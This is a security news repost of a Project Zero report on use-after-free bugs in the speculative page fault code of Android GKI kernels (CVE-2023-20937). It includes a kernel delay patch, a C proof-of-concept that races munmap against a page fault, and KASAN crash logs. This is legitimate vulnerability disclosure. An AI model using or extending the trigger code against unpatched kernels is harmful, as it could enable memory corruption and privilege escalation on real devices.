Security
Headlines
HeadlinesLatestCVEs

Headline

Android GKI Kernels Contain Broken Non-Upstream Speculative Page Faults MM Code

Android GKI kernels contain broken non-upstream Speculative Page Faults MM code that can lead to multiple use-after-free conditions.

Packet Storm
#ios#android#google#linux#debian#git#c++#bios#ibm
Android: GKI kernels contain broken non-upstream Speculative Page Faults MM codeA central recurring theme in Linux MM development is that contention on themmap lock can have a big negative performance impact on multithreaded workloads:If one thread is holding the mmap lock in exclusive mode for an extended amountof time, other threads will block as soon as they try to handle a page fault.Therefore there is a bunch of work to downgrade exclusive lock holders tonon-exclusive lock holders, shrink critical sections, and avoid holding the lockaltogether in some cases.One proposal to avoid holding the mmap lock in page fault handling are\"Speculative page faults (SPF)\"; here's a patch series from 2019 that had alreadygone through 11 rounds of review:<https://lore.kernel.org/lkml/[email protected]/t/>This patch series didn't land at the time; but something along those lines mightland upstream in the next few years.But for some reason, Android decided that they need speculative page faultsimmediately, and merged the patches that were discussed on the upstream mailinglist into their GKI kernels. This is problematic for two reasons:A) The MM code is complicated and easy to get wrong.   If you run MM code that has not been through the fuzzing, testing and review   that committed upstream code gets, there's a higher chance of undiscovered   bugs.B) The SPF patches **change the rules** that MM code has to follow, so now   Android's version of MM has different rules than upstream MM.   This means that any patches in vaguely related parts of upstream MM need to   be checked by an Android engineer to see if they conflict with Android's   special rules.As far as I can tell, there are a bunch of memory safety bugs in the SPF versionthat is currently in AOSP's android13-5.10 branch (at commit 232bdcbd660b):1. handle_pte_fault() calls pmd_none() without protection against concurrent   page table deletion, leading to UAF read.2. do_anonymous_page() calls pte_alloc() without protection against concurrent   page table deletion, leading to UAF write.3. do_anonymous_page() calls pmd_trans_unstable() without protection against   concurrent page table deletion, leading to UAF read.4. do_swap_page() -> migration_entry_wait() -> __migration_entry_wait() operates   on a page table without protection against concurrent page table deletion,   leading to use-after-union-change read+write in struct page (on the page   table lock) and use-after-free read of a page table entry (resulting in bogus   page* calculation)5. do_wp_page() calls handle_userfault() without protection against concurrent   userfaultfd_release(), leading to UAF reads of some flags from   userfaultfd_ctx.   I think back when the SPF series was posted upstream, there might have been   sufficient protection against this (because ___handle_speculative_fault()   bails on VMAs with VM_UFFD_MISSING), but since then the WP userfaultfd   support was added, and ___handle_speculative_fault() doesn't bail on   VM_UFFD_WP. do_wp_page() also doesn't check the cached VMA flags, it uses   userfaultfd_pte_wp() which reads flags from the VMA.6. The way seqcounts are used to detect concurrent writers looks wrong.   The seqcount API requires that only one writer at a time can be in a   vm_write_begin() / vm_write_end() section, but these helpers are used in   codepaths that only hold the mmap lock in shared mode, so there can be   concurrent writers.   As far as I can tell, this means that when there are an even number of   concurrent writers, it will look as if there are no active writers.   This _probably_ doesn't have much security impact because all of the places   that do vm_write_begin() where concurrency would be an actual problem seem to   hold the mmap lock in exclusive mode?As an example, I tested issue 2. To reproduce this easily, I patched an extradelay into the kernel:```diff --git a/mm/memory.c b/mm/memory.cindex 83b715ed65775..35ce412d0a965 100644--- a/mm/memory.c+++ b/mm/memory.c@@ -84,6 +84,8 @@ #include <asm/tlb.h> #include <asm/tlbflush.h> +#include <linux/delay.h>+ #include \"pgalloc-track.h\" #include \"internal.h\" @@ -3819,6 +3821,12 @@ static vm_fault_t do_anonymous_page(struct vm_fault *vmf)        vm_fault_t ret = 0;        pte_t entry; +       if (strcmp(current->comm, \"SLOWME\") == 0 && (vmf->flags & FAULT_FLAG_SPECULATIVE)) {+               pr_warn(\"%s: BEGIN DELAY 0x%lx\\", __func__, vmf->address);+               mdelay(2000);+               pr_warn(\"%s: END DELAY 0x%lx\\", __func__, vmf->address);+       }+        /* File mapping without ->vm_ops ? */        if (vmf->vma_flags & VM_SHARED)                return VM_FAULT_SIGBUS;```Then, I ran this testcase on an x86 build with ASAN and CONFIG_PREEMPT:```#define _GNU_SOURCE#include <pthread.h>#include <err.h>#include <unistd.h>#include <sys/prctl.h>#include <sys/mman.h>// basic idea:// delete the 1G-covering page table while do_anonymous_page() is at its entry// point#define VMA_ADDR ((void*)0x40000000UL)#define VMA_SIZE (0x40000000UL)#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})static void *thread_fn(void *dummy) {  SYSCHK(prctl(PR_SET_NAME, \"SLOWME\"));  *(volatile char *)VMA_ADDR;  SYSCHK(prctl(PR_SET_NAME, \"spfthread\"));}int main(void) {  SYSCHK(mmap(VMA_ADDR, VMA_SIZE, PROT_READ|PROT_WRITE,                        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));  SYSCHK(madvise(VMA_ADDR, VMA_SIZE, MADV_NOHUGEPAGE));  // create anon_vma and page tables  *(volatile char *)(VMA_ADDR+0x1000) = 1;  pthread_t thread;  if (pthread_create(&thread, NULL, thread_fn, NULL))    errx(1, \"pthread_create\");  sleep(1);  munmap(VMA_ADDR, VMA_SIZE);  if (pthread_join(thread, NULL))    errx(1, \"pthread_join\");  return 0;}```This first results in a UAF read of a PTE:```do_anonymous_page: BEGIN DELAY 0x40000000do_anonymous_page: END DELAY 0x40000000==================================================================BUG: KASAN: use-after-free in handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687) Read of size 8 at addr ffff88800f358000 by task SLOWME/724CPU: 12 PID: 724 Comm: SLOWME Not tainted 5.10.107-00033-g232bdcbd660b-dirty #215Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014Call Trace:dump_stack_lvl (lib/dump_stack.c:120) [...]print_address_description.constprop.0 (mm/kasan/report.c:257) [...][...]kasan_report.cold (mm/kasan/report.c:444 mm/kasan/report.c:460) [...]handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687) [...]___handle_speculative_fault (./include/linux/memcontrol.h:686 mm/memory.c:5106) [...]__handle_speculative_fault (mm/memory.c:5148) [...]do_user_addr_fault (arch/x86/mm/fault.c:1320) [...]exc_page_fault (./arch/x86/include/asm/irqflags.h:157 arch/x86/mm/fault.c:1470 arch/x86/mm/fault.c:1518) [...]asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:571) RIP: 0033:0x55d52bfe41fb```Then pte_alloc() tries to lock the page table entry:```BUG: KASAN: use-after-free in do_raw_spin_lock (kernel/locking/spinlock_debug.c:83 kernel/locking/spinlock_debug.c:112) Read of size 4 at addr ffff88801a730004 by task SLOWME/724```and after that, it will write into the freed page table.From a security perspective, my recommendation is to fix this by reverting thespeculative page fault patches out of the GKI trees, since I believe that sucha divergence from upstream semantics is not maintainable. Looking through thecommit history of the AOSP android13-5.10 kernel branch also shows that a seriesof bugs have already been discovered that were introduced by SPF:81a1ae6b4395a ANDROID: mm: unlock the page on speculative fault retry88e4dbaf592d8 ANDROID: Make MGLRU aware of speculative faults320ffbea77113 ANDROID: mm: Fix page table lookup in speculative fault path729a79f366e5e ANDROID: fix mmu_notifier race caused by not taking mmap_lock during SPFc3cbea92297d5 ANDROID: mm: avoid writing to read-only elementsdd3f538bf715c ANDROID: x86/mm: fix vm_area_struct leak in speculative pagefault handlingcf397c6c269ac ANDROID: mm: sync rss in speculative page fault path531f65ae67382 ANDROID: mm: Fix sleeping while atomic during speculative page faultThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-02-01.Please note that, according to our disclosure policy, if Project Zero discoversa variant of a previously reported Project Zero bug, technical details of thevariant will be added to the existing Project Zero report (which may be alreadypublic) and the report will not receive a new deadline.Project Zero will consider new race conditions where the SPF fault path accessespage tables or the VMA without sufficient locking variants of this issue.This includes issues that are introduced after this bug is reported.For more details, seehttps://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.Related CVE Number: CVE-2023-20937.Found by: [email protected]

Related news

CVE-2022-20455: Android Security Bulletin—February 2023

In addAutomaticZenRule of ZenModeHelper.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242537431

Packet Storm: Latest News

Zeek 6.0.8